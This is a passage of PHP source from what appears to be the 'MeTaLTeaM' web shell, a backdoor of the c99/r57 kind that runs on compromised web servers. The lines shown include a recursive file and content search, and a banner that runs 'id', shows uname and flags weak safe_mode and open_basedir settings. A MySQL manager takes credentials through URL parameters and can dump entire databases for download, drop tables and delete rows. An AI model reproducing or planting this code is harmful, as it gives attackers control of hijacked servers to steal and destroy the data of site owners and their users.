770 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
771 if (is_dir($d.$f))
772 {
773 $search_i_d++;
774 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
775 if (!is_link($d.$f)) {k1r4fsearch($d.$f);}
776 }
777 else
778 {
779 $search_i_f++;
780 if ($bool)
781 {
782 if (!empty($a["text"]))
783 {
784 $r = @file_get_contents($d.$f);
785 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
786 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
787 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
788 else {$bool = strpos(" ".$r,$a["text"],1);}
789 if ($a["text_not"]) {$bool = !$bool;}
790 if ($bool) {$found[] = $d.$f; $found_f++;}
791 }
792 else {$found[] = $d.$f; $found_f++;}
793 }
794 }
795 }
796 }
797 closedir($h);
798}
799}
800if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
801//Sending headers
802@ob_start();
803@ob_implicit_flush(0);
804function onphpshutdown()
805{
806 global $gzipencode,$ft;
807 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
808 {
809 $v = @ob_get_contents();
810 @ob_end_clean();
811 @ob_start("ob_gzHandler");
812 echo $v;
813 @ob_end_flush();
814 }
815}
816function k1r4exit()
817{
818 onphpshutdown();
819 exit;
820}
821header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
822header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
823header("Cache-Control: no-store, no-cache, must-revalidate");
824header("Cache-Control: post-check=0, pre-check=0", FALSE);
825header("Pragma: no-cache");
826if (empty($tmpdir))
827{
828 $tmpdir = ini_get("upload_tmp_dir");
829 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
830}
831$tmpdir = realpath($tmpdir);
832$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
833if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
834if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
835else {$tmpdir_logs = realpath($tmpdir_logs);}
836if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
837{
838 $safemode = TRUE;
839 $hsafemode = "<font color=red>ON (secure)</font>";
840}
841else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (no secure)</font>";}
842$v = @ini_get("open_basedir");
843if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
844else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
845$sort = htmlspecialchars($sort);
846if (empty($sort)) {$sort = $sort_default;}
847$sort[1] = strtolower($sort[1]);
848$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
849if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
850$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
851@ini_set("highlight.bg",$highlight_bg); //FFFFFF
852@ini_set("highlight.comment",$highlight_comment); //#FF8000
853@ini_set("highlight.default",$highlight_default); //#0000BB
854@ini_set("highlight.html",$highlight_html); //#000000
855@ini_set("highlight.keyword",$highlight_keyword); //#007700
856@ini_set("highlight.string",$highlight_string); //#DD0000
857if (!is_array($actbox)) {$actbox = array();}
858$dspact = $act = htmlspecialchars($act);
859$disp_fullpath = $ls_arr = $notls = null;
860$ud = urlencode($d);
861?>
862<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - MeTaLTeaM.ORG</title><STYLE>
863TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #0099CC; FONT-FAMILY: Tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #000000;}body,td,th { font-family: verdana; color: #CCCCCC; font-size: 11px;}body { background-color: #000000;}
864</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>MeTaLTeaM <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
865$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
866if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
867$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
868if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
869$d = str_replace("\\\\","\\",$d);
870$dispd = htmlspecialchars($d);
871$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
872$i = 0;
873foreach($pd as $b)
874{
875 $t = "";
876 $j = 0;
877 foreach ($e as $r)
878 {
879 $t.= $r.DIRECTORY_SEPARATOR;
880 if ($j == $i) {break;}
881 $j++;
882 }
883 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
884 $i++;
885}
886echo "&nbsp;&nbsp;&nbsp;";
887if (is_writable($d))
888{
889 $wd = TRUE;
890 $wdt = "<font color=green>[ ok ]</font>";
891 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
892}
893else
894{
895 $wd = FALSE;
896 $wdt = "<font color=red>[ Read-Only ]</font>";
897 echo "<b>".view_perms_color($d)."</b>";
898}
899if (is_callable("disk_free_space"))
900{
901 $free = disk_free_space($d);
902 $total = disk_total_space($d);
903 if ($free === FALSE) {$free = 0;}
904 if ($total === FALSE) {$total = 0;}
905 if ($free < 0) {$free = 0;}
906 if ($total < 0) {$total = 0;}
907 $used = $total-$free;
908 $free_percent = round(100/($total/$free),2);
909 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
910}
911echo "<br>";
912$letters = "";
913if ($win)
914{
915 $v = explode("\\",$d);
916 $v = $v[0];
917 foreach (range("a","z") as $letter)
918 {
919 $bool = $isdiskette = in_array($letter,$safemode_diskettes);
920 if (!$bool) {$bool = is_dir($letter.":\\");}
921 if ($bool)
922 {
923 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
924 if ($letter.":" != $v) {$letters .= $letter;}
925 else {$letters .= "<font color=green>".$letter."</font>";}
926 $letters .= " ]</a> ";
927 }
928 }
929 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
930}
931if (count($quicklaunch) > 0)
932{
933 foreach($quicklaunch as $item)
934 {
935 $item[1] = str_replace("%d",urlencode($d),$item[1]);
936 $item[1] = str_replace("%sort",$sort,$item[1]);
937 $v = realpath($d."..");
938 if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
939 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
940 echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
941 }
942}
943echo "</p></td></tr></table><br>";
944if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
945echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
946if ($act == "") {$act = $dspact = "ls";}
947if ($act == "sql")
948{
949 $sql_surl = $surl."act=sql";
950 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
951 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
952 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
953 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
954 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
955 $sql_surl .= "&";
956 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
957 if ($sql_server)
958 {
959 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
960 $err = mysql_smarterror();
961 @mysql_select_db($sql_db,$sql_sock);
962 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
963 }
964 else {$sql_sock = FALSE;}
965 echo "<b>SQL Manager:</b><br>";
966 if (!$sql_sock)
967 {
968 if (!$sql_server) {echo "NO CONNECTION";}
969 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
970 }
971 else
972 {
973 $sqlquicklaunch = array();
974 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
975 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
976 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
977 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
978 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
979 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
980 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
981 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
982 echo "</center>";
983 }
984 echo "</td></tr><tr>";
985 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
986 else
987 {
988 //Start left panel
989 if (!empty($sql_db))
990 {
991 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
992 $result = mysql_list_tables($sql_db);
993 if (!$result) {echo mysql_smarterror();}
994 else
995 {
996 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
997 $c = 0;
998 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
999 if (!$c) {echo "No tables found in database.";}
1000 }
1001 }
1002 else
1003 {
1004 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
1005 $result = mysql_list_dbs($sql_sock);
1006 if (!$result) {echo mysql_smarterror();}
1007 else
1008 {
1009 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
1010 $c = 0;
1011 $dbs = "";
1012 while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
1013 echo "<option value=\"\">Databases (".$c.")</option>";
1014 echo $dbs;
1015 }
1016 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
1017 }
1018 //End left panel
1019 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
1020 //Start center panel
1021 $diplay = TRUE;
1022 if ($sql_db)
1023 {
1024 if (!is_numeric($c)) {$c = 0;}
1025 if ($c == 0) {$c = "no";}
1026 echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
1027 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
1028 echo "</b></center>";
1029 $acts = array("","dump");
1030 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1031 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1032 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1033 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1034 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1035 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1036 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1037 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1038 elseif ($sql_tbl_act == "insert")
1039 {
1040 if ($sql_tbl_insert_radio == 1)
1041 {
1042 $keys = "";
1043 $akeys = array_keys($sql_tbl_insert);
1044 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1045 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1046 $values = "";
1047 $i = 0;
1048 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1049 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1050 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1051 $sql_act = "query";
1052 $sql_tbl_act = "browse";
1053 }
1054 elseif ($sql_tbl_insert_radio == 2)
1055 {
1056 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1057 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1058 $result = mysql_query($sql_query) or print(mysql_smarterror());
1059 $result = mysql_fetch_array($result, MYSQL_ASSOC);
1060 $sql_act = "query";
1061 $sql_tbl_act = "browse";
1062 }
1063 }
1064 if ($sql_act == "query")
1065 {
1066 echo "<hr size=\"1\" noshade>";
1067 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1068 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
1069 if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
1070 }
1071 if (in_array($sql_act,$acts))
1072 {
1073 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
1074 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
1075 if ($sql_act == "newtbl")
1076 {
1077 echo "<b>";
1078 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1079 }
1080 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1081 }
1082 elseif ($sql_act == "dump")
1083 {
1084 if (empty($submit))
1085 {
1086 $diplay = FALSE;
1087 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1088 echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1089 $v = join (";",$dmptbls);
1090 echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1091 if ($dump_file) {$tmp = $dump_file;}
1092 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1093 echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1094 echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1095 echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1096 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
1097 echo "</form>";
1098 }
1099 else
1100 {
1101 $diplay = TRUE;
1102 $set = array();
1103 $set["sock"] = $sql_sock;
1104 $set["db"] = $sql_db;
1105 $dump_out = "download";
1106 $set["print"] = 0;
1107 $set["nl2br"] = 0;
1108 $set[""] = 0;
1109 $set["file"] = $dump_file;
1110 $set["add_drop"] = TRUE;
1111 $set["onlytabs"] = array();
1112 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1113 $ret = mysql_dump($set);
1114 if ($sql_dump_download)
1115 {
1116 @ob_clean();
1117 header("Content-type: application/octet-stream");
1118 header("Content-length: ".strlen($ret));
1119 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1120 echo $ret;
1121 exit;
1122 }
1123 elseif ($sql_dump_savetofile)
1124 {
1125 $fp = fopen($sql_dump_file,"w");
1126 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1127 else
1128 {
1129 fwrite($fp,$ret);
1130 fclose($fp);
1131 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1132 }
1133 }
1134 else {echo "<b>Dump: nothing to do!</b>";}
1135 }
1136 }
1137 if ($diplay)
1138 {
1139 if (!empty($sql_tbl))
1140 {
1141 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
1142 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1143 $count_row = mysql_fetch_array($count);
1144 mysql_free_result($count);
1145 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1146 $tbl_struct_fields = array();
1147 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1148 if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
1149 if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
1150 if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
1151 if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
1152 $perpage = $sql_tbl_le - $sql_tbl_ls;
1153 if (!is_numeric($perpage)) {$perpage = 10;}
1154 $numpages = $count_row[0]/$perpage;
1155 $e = explode(" ",$sql_order);
1156 if (count($e) == 2)
1157 {
1158 if ($e[0] == "d") {$asc_desc = "DESC";}
1159 else {$asc_desc = "ASC";}
1160 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1161 }
1162 else {$v = "";}
1163 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1164 $result = mysql_query($query) or print(mysql_smarterror());
1165 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1166 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1167 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1168 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
